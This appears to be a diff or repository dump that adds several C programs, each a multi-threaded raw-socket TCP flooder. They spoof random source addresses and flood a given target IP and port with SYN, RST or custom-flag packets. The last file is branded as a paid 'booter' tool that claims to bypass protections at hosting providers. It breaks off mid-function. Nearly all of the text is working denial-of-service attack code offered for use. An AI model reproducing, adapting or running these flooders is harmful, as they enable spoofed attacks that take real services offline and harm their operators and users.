void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 1;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,242 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products ;)
|
||||
*/
|
||||
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
int ack,syn,psh,fin,rst,urg,ptr,res2,seq;
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(rand()%54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("8.8.8.8");
|
||||
}
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(rand()%65535);
|
||||
tcph->seq = rand();
|
||||
tcph->ack = ack;
|
||||
tcph->ack_seq = seq;
|
||||
tcph->psh = psh;
|
||||
tcph->fin = fin;
|
||||
tcph->rst = rst;
|
||||
tcph->res2 = res2;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = syn;
|
||||
tcph->urg = urg;
|
||||
tcph->urg_ptr = ptr;
|
||||
tcph->window = rand();
|
||||
tcph->check = 0;
|
||||
}
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
tcph->dest = htons(floodport);
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 7){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port> <threads> <pps limiter, -1 for no limit> <time> <ack,syn,psh,fin,rst,urg,ptr,res2,seq>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
fprintf(stdout, "Opening sockets...\n");
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
if(strstr(argv[6], "ack"))
|
||||
ack = 1;
|
||||
else
|
||||
ack = 0;
|
||||
if(strstr(argv[6], "seq"))
|
||||
seq = 1;
|
||||
else
|
||||
seq = 0;
|
||||
if(strstr(argv[6], "psh"))
|
||||
psh = 1;
|
||||
else
|
||||
psh = 0;
|
||||
if(strstr(argv[6], "fin"))
|
||||
fin = 1;
|
||||
else
|
||||
fin = 0;
|
||||
if(strstr(argv[6], "rst"))
|
||||
rst = 1;
|
||||
else
|
||||
rst = 0;
|
||||
if(strstr(argv[6], "res2"))
|
||||
res2 = 1;
|
||||
else
|
||||
res2 = 0;
|
||||
if(strstr(argv[6], "syn"))
|
||||
syn = 1;
|
||||
else
|
||||
syn = 0;
|
||||
if(strstr(argv[6], "urg"))
|
||||
urg = 1;
|
||||
else
|
||||
urg = 0;
|
||||
if(strstr(argv[6], "ptr"))
|
||||
ptr = 1;
|
||||
else
|
||||
ptr = 0;
|
||||
int multiplier = 20;
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Sending attack...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,218 @@
|
|||
/*
|
||||
* This is released under the GNU GPL License v3.0, and is allowed to be used for commercial products. ;)
|
||||
*/
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/ioctl.h>
|
||||
#include <string.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdio.h>
|
||||
#include <pthread.h>
|
||||
#include <netinet/tcp.h>
|
||||
#include <netinet/ip.h>
|
||||
#include <netinet/in.h>
|
||||
#include <netinet/if_ether.h>
|
||||
#include <netdb.h>
|
||||
#include <net/if.h>
|
||||
#include <arpa/inet.h>
|
||||
|
||||
#define MAX_PACKET_SIZE 4096
|
||||
#define PHI 0x9e3779b9
|
||||
|
||||
static unsigned long int Q[4096], c = 362436;
|
||||
static unsigned int floodport;
|
||||
volatile int limiter;
|
||||
volatile unsigned int pps;
|
||||
volatile unsigned int sleeptime = 100;
|
||||
|
||||
void init_rand(unsigned long int x)
|
||||
{
|
||||
int i;
|
||||
Q[0] = x;
|
||||
Q[1] = x + PHI;
|
||||
Q[2] = x + PHI + PHI;
|
||||
for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
|
||||
}
|
||||
unsigned long int rand_cmwc(void)
|
||||
{
|
||||
unsigned long long int t, a = 18782LL;
|
||||
static unsigned long int i = 4095;
|
||||
unsigned long int x, r = 0xfffffffe;
|
||||
i = (i + 1) & 4095;
|
||||
t = a * Q[i] + c;
|
||||
c = (t >> 32);
|
||||
x = t + c;
|
||||
if (x < c) {
|
||||
x++;
|
||||
c++;
|
||||
}
|
||||
return (Q[i] = r - x);
|
||||
}
|
||||
unsigned short csum (unsigned short *buf, int count)
|
||||
{
|
||||
register unsigned long sum = 0;
|
||||
while( count > 1 ) { sum += *buf++; count -= 2; }
|
||||
if(count > 0) { sum += *(unsigned char *)buf; }
|
||||
while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
|
||||
return (unsigned short)(~sum);
|
||||
}
|
||||
|
||||
unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
|
||||
|
||||
struct tcp_pseudo
|
||||
{
|
||||
unsigned long src_addr;
|
||||
unsigned long dst_addr;
|
||||
unsigned char zero;
|
||||
unsigned char proto;
|
||||
unsigned short length;
|
||||
} pseudohead;
|
||||
unsigned short total_len = iph->tot_len;
|
||||
pseudohead.src_addr=iph->saddr;
|
||||
pseudohead.dst_addr=iph->daddr;
|
||||
pseudohead.zero=0;
|
||||
pseudohead.proto=IPPROTO_TCP;
|
||||
pseudohead.length=htons(sizeof(struct tcphdr));
|
||||
int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
|
||||
unsigned short *tcp = malloc(totaltcp_len);
|
||||
memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
|
||||
memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
|
||||
unsigned short output = csum(tcp,totaltcp_len);
|
||||
free(tcp);
|
||||
return output;
|
||||
}
|
||||
|
||||
void setup_ip_header(struct iphdr *iph)
|
||||
{
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
iph->id = htonl(54321);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = MAXTTL;
|
||||
iph->protocol = 6;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr("192.168.3.100");
|
||||
}
|
||||
|
||||
void setup_tcp_header(struct tcphdr *tcph)
|
||||
{
|
||||
tcph->source = htons(5678);
|
||||
tcph->seq = rand();
|
||||
tcph->ack_seq = 1;
|
||||
tcph->res2 = 2;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 1;
|
||||
tcph->window = htons(65535);
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
}
|
||||
|
||||
void *flood(void *par1)
|
||||
{
|
||||
char *td = (char *)par1;
|
||||
char datagram[MAX_PACKET_SIZE];
|
||||
struct iphdr *iph = (struct iphdr *)datagram;
|
||||
struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
|
||||
|
||||
struct sockaddr_in sin;
|
||||
sin.sin_family = AF_INET;
|
||||
sin.sin_port = htons(floodport);
|
||||
sin.sin_addr.s_addr = inet_addr(td);
|
||||
|
||||
int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
if(s < 0){
|
||||
fprintf(stderr, "Could not open raw socket.\n");
|
||||
exit(-1);
|
||||
}
|
||||
memset(datagram, 0, MAX_PACKET_SIZE);
|
||||
setup_ip_header(iph);
|
||||
setup_tcp_header(tcph);
|
||||
|
||||
tcph->dest = htons(floodport);
|
||||
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
int tmp = 1;
|
||||
const int *val = &tmp;
|
||||
if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
|
||||
fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
init_rand(time(NULL));
|
||||
register unsigned int i;
|
||||
i = 0;
|
||||
while(1){
|
||||
sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
|
||||
|
||||
iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
|
||||
iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
|
||||
iph->check = csum ((unsigned short *) datagram, iph->tot_len);
|
||||
tcph->seq = rand_cmwc() & 0xFFFF;
|
||||
tcph->source = htons(rand_cmwc() & 0xFFFF);
|
||||
tcph->check = 0;
|
||||
tcph->check = tcpcsum(iph, tcph);
|
||||
|
||||
pps++;
|
||||
if(i >= limiter)
|
||||
{
|
||||
i = 0;
|
||||
usleep(sleeptime);
|
||||
}
|
||||
i++;
|
||||
}
|
||||
}
|
||||
int main(int argc, char *argv[ ])
|
||||
{
|
||||
if(argc < 6){
|
||||
fprintf(stderr, "Invalid parameters!\n");
|
||||
fprintf(stdout, "Usage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
|
||||
exit(-1);
|
||||
}
|
||||
|
||||
fprintf(stdout, "Setting up Sockets...\n");
|
||||
|
||||
int num_threads = atoi(argv[3]);
|
||||
floodport = atoi(argv[2]);
|
||||
int maxpps = atoi(argv[4]);
|
||||
limiter = 0;
|
||||
pps = 0;
|
||||
pthread_t thread[num_threads];
|
||||
|
||||
int multiplier = 20;
|
||||
|
||||
int i;
|
||||
for(i = 0;i<num_threads;i++){
|
||||
pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
|
||||
}
|
||||
fprintf(stdout, "Starting Flood...\n");
|
||||
for(i = 0;i<(atoi(argv[5])*multiplier);i++)
|
||||
{
|
||||
usleep((1000/multiplier)*1000);
|
||||
if((pps*multiplier) > maxpps)
|
||||
{
|
||||
if(1 > limiter)
|
||||
{
|
||||
sleeptime+=100;
|
||||
} else {
|
||||
limiter--;
|
||||
}
|
||||
} else {
|
||||
limiter++;
|
||||
if(sleeptime > 25)
|
||||
{
|
||||
sleeptime-=25;
|
||||
} else {
|
||||
sleeptime = 0;
|
||||
}
|
||||
}
|
||||
pps = 0;
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,329 @@
|
|||
//
|
||||
//
|
||||
// SYBEX 3.0 BOOTER.PW
|
||||
//
|
||||
// Specially made to Serial from Alemalakra.
|
||||
//
|
||||
// Type: TCP-RST Spoofed Bypass PPS.
|
||||
// Price: ????????
|
||||
// Version: 3.0
|
||||
//
|
||||
// "-1" PPS For use all Packets-Per-Second.
|
||||
// "0" on Port for send Destination-ports fully random, New Bypass.
|
||||
// Improved whole script, Works on most targets, Including digital ocean and Hetzner.
|
||||
//
|
||||
//
|
||||
|
||||
#include<stdio.h>
|
||||
#include<string.h> //memset
|
||||
#include<sys/socket.h>
|
||||
#include<stdlib.h> //for exit(0);
|
||||
#include<errno.h> //For errno - the error number
|
||||
#include<netinet/tcp.h> //Provides declarations for tcp header
|
||||
#include <arpa/inet.h>
|
||||
#include<netinet/ip.h> //Provides declarations for ip header
|
||||
#include <pthread.h>
|
||||
#include <stdint.h>
|
||||
#include <unistd.h>
|
||||
#include <sys/types.h>
|
||||
#include <stdbool.h>
|
||||
#include <time.h>
|
||||
static unsigned int floodport;
|
||||
#define BUFFER_SIZE 100
|
||||
char sourceip[17];
|
||||
volatile int limiter; // PPS Limitator.
|
||||
volatile unsigned int pps; // PPS per Second, Global variable including for Threads.
|
||||
volatile unsigned int sleeptime = 100; // Sleep in miliseconds for each packet if pps exeded.
|
||||
|
||||
volatile unsigned int lenght_pkt = 0;
|
||||
struct pseudo_header
|
||||
{
|
||||
u_int32_t source_address;
|
||||
u_int32_t dest_address;
|
||||
u_int8_t placeholder;
|
||||
u_int8_t protocol;
|
||||
u_int16_t tcp_length;
|
||||
struct tcphdr tcp;
|
||||
};
|
||||
|
||||
unsigned short checksum_tcp_packet(unsigned short *ptr,int nbytes) {
|
||||
register long sum;
|
||||
unsigned short oddbyte;
|
||||
register short answer;
|
||||
|
||||
sum=0;
|
||||
while(nbytes>1) {
|
||||
sum+=*ptr++;
|
||||
nbytes-=2;
|
||||
}
|
||||
if(nbytes==1) {
|
||||
oddbyte=0;
|
||||
*((u_char*)&oddbyte)=*(u_char*)ptr;
|
||||
sum+=oddbyte;
|
||||
}
|
||||
|
||||
sum = (sum>>16)+(sum & 0xffff);
|
||||
sum = sum + (sum>>16);
|
||||
answer=(short)~sum;
|
||||
|
||||
return(answer);
|
||||
}
|
||||
|
||||
void *mexico(void *par1)
|
||||
{
|
||||
|
||||
// Make socket
|
||||
|
||||
int s = socket (PF_INET, SOCK_RAW, IPPROTO_TCP);
|
||||
|
||||
|
||||
if(s == -1)
|
||||
{
|
||||
perror("[!] For use Script you need root stupid...");
|
||||
exit(1);
|
||||
}
|
||||
|
||||
|
||||
// Declares
|
||||
|
||||
char *targettr = (char *)par1;
|
||||
|
||||
char datagram[4096] , source_ip[32] , *data , *pseudogram;
|
||||
|
||||
//zero out the packet buffer
|
||||
memset (datagram, 0, 4096);
|
||||
|
||||
//IP header
|
||||
struct iphdr *iph = (struct iphdr *) datagram;
|
||||
|
||||
//TCP header
|
||||
struct tcphdr *tcph = (struct tcphdr *) (datagram + sizeof (struct ip));
|
||||
struct sockaddr_in sin;
|
||||
struct pseudo_header psh;
|
||||
|
||||
//Data part
|
||||
data = datagram + sizeof(struct iphdr) + sizeof(struct tcphdr);
|
||||
if (lenght_pkt == 0) { // bypass pps
|
||||
data = "";
|
||||
}
|
||||
|
||||
|
||||
// Source Address and Such.
|
||||
|
||||
|
||||
char primera [ 20 ] ;
|
||||
|
||||
|
||||
int one_r = randommexico(1, 250);
|
||||
int two_r = randommexico(1, 250);
|
||||
int three_r = randommexico(1, 250);
|
||||
int four_r = randommexico(1, 250);
|
||||
snprintf(primera, sizeof(primera)-1, "%d.%d.%d.%d", one_r, two_r, three_r, four_r);
|
||||
|
||||
snprintf(sourceip, sizeof(sourceip)-1, primera);
|
||||
strcpy(source_ip , sourceip);
|
||||
sin.sin_family = AF_INET;
|
||||
|
||||
|
||||
int rdzeroport;
|
||||
|
||||
if (floodport == 0) {
|
||||
rdzeroport = randommexico(2, 65535);
|
||||
|
||||
sin.sin_port = htons(rdzeroport);
|
||||
tcph->dest = htons (rdzeroport);
|
||||
|
||||
} else {
|
||||
|
||||
sin.sin_port = htons(floodport);
|
||||
tcph->dest = htons (floodport);
|
||||
|
||||
}
|
||||
|
||||
|
||||
|
||||
sin.sin_addr.s_addr = inet_addr (targettr);
|
||||
iph->ihl = 5;
|
||||
iph->version = 4;
|
||||
iph->tos = 0;
|
||||
iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
|
||||
iph->id = htons(1);
|
||||
iph->frag_off = 0;
|
||||
iph->ttl = 64;
|
||||
iph->protocol = IPPROTO_TCP;
|
||||
iph->check = 0;
|
||||
iph->saddr = inet_addr ( source_ip );
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = checksum_tcp_packet ((unsigned short *) datagram, iph->tot_len);
|
||||
int randSeq = randommexico(10000, 99999);
|
||||
int randAckSeq = randommexico(10000, 99999);
|
||||
int randSP = randommexico(2, 65535);
|
||||
int randPD = randommexico(2, 65535);
|
||||
int randttl = randommexico(1, 255);
|
||||
int randihl = randommexico(4, 7);
|
||||
int randWin = randommexico(1000, 9999);
|
||||
tcph->source = randSP;
|
||||
|
||||
tcph->seq = randSeq;
|
||||
tcph->ack_seq = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->fin=0;
|
||||
tcph->syn=1;
|
||||
tcph->rst=0;
|
||||
tcph->psh=0;
|
||||
tcph->ack=0;
|
||||
tcph->urg=0;
|
||||
tcph->window = randWin;
|
||||
tcph->check = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
|
||||
psh.source_address = inet_addr( source_ip );
|
||||
psh.dest_address = sin.sin_addr.s_addr;
|
||||
psh.placeholder = 0;
|
||||
psh.protocol = IPPROTO_TCP;
|
||||
psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
|
||||
|
||||
|
||||
int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
|
||||
pseudogram = malloc(psize);
|
||||
|
||||
memcpy(pseudogram , (char*) &psh , sizeof (struct pseudo_header));
|
||||
memcpy(pseudogram + sizeof(struct pseudo_header) , tcph , sizeof(struct tcphdr) + strlen(data));
|
||||
|
||||
tcph->check = checksum_tcp_packet( (unsigned short*) pseudogram , psize);
|
||||
|
||||
|
||||
//tcph->check = checksum_tcp_packet( (unsigned short*) &psh , sizeof (struct pseudo_header));
|
||||
int one = 1;
|
||||
const int *val = &one;
|
||||
if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (one)) < 0)
|
||||
{
|
||||
exit(0);
|
||||
}
|
||||
int i;
|
||||
while (1)
|
||||
{
|
||||
//Send the packet
|
||||
if (sendto (s, datagram, iph->tot_len , 0, (struct sockaddr *) &sin, sizeof (sin)) < 0) /* a normal send() */
|
||||
{
|
||||
printf ("[!] Error sending Packet!\n");
|
||||
exit(0);
|
||||
} else {
|
||||
one_r = randommexico(1, 250);
|
||||
two_r = randommexico(1, 250);
|
||||
three_r = randommexico(1, 250);
|
||||
four_r = randommexico(1, 250);
|
||||
snprintf(primera, sizeof(primera)-1, "%d.%d.%d.%d", one_r, two_r, three_r, four_r);
|
||||
snprintf(sourceip, sizeof(sourceip)-1, primera);
|
||||
strcpy(source_ip , sourceip);
|
||||
|
||||
iph->saddr = inet_addr ( source_ip );
|
||||
psh.source_address = inet_addr( source_ip );
|
||||
if (lenght_pkt == 0) { // bypass pps
|
||||
data = "";
|
||||
}
|
||||
|
||||
|
||||
if (floodport == 0) {
|
||||
rdzeroport = randommexico(2, 65535);
|
||||
|
||||
sin.sin_port = htons(rdzeroport);
|
||||
tcph->dest = htons (rdzeroport);
|
||||
|
||||
} else {
|
||||
|
||||
sin.sin_port = htons(floodport);
|
||||
tcph->dest = htons (floodport);
|
||||
|
||||
}
|
||||
|
||||
|
||||
randSeq = randommexico(10000, 99999);
|
||||
randAckSeq = randommexico(10000, 99999);
|
||||
randSP = randommexico(2, 65535);
|
||||
randPD = randommexico(2, 65535);
|
||||
randttl = randommexico(1, 255);
|
||||
randWin = 512;
|
||||
|
||||
tcph->source = randSP;
|
||||
tcph->doff = 5; /* first and only tcp segment */
|
||||
tcph->seq = htons(randSeq);
|
||||
tcph->ack = 0;
|
||||
tcph->ack_seq = 0;
|
||||
tcph->psh = 0;
|
||||
tcph->fin = 0;
|
||||
tcph->rst = 1;
|
||||
tcph->res2 = 0;
|
||||
tcph->doff = 5;
|
||||
tcph->syn = 0;
|
||||
tcph->urg = 0;
|
||||
tcph->urg_ptr = 0;
|
||||
|
||||
tcph->window = htons(0);
|
||||
tcph->check = 0;
|
||||
|
||||
iph->tot_len = sizeof (struct iphdr) + sizeof (struct tcphdr) + strlen(data);
|
||||
iph->protocol = IPPROTO_TCP;
|
||||
iph->check = 0; //Set to 0 before calculating checksum
|
||||
iph->daddr = sin.sin_addr.s_addr;
|
||||
iph->check = checksum_tcp_packet ((unsigned short *) datagram, iph->tot_len);
|
||||
|
||||
psh.tcp_length = htons(sizeof(struct tcphdr) + strlen(data) );
|
||||
int psize = sizeof(struct pseudo_header) + sizeof(struct tcphdr) + strlen(data);
|
||||
pseudogram = malloc(psize);
|
||||
|
||||
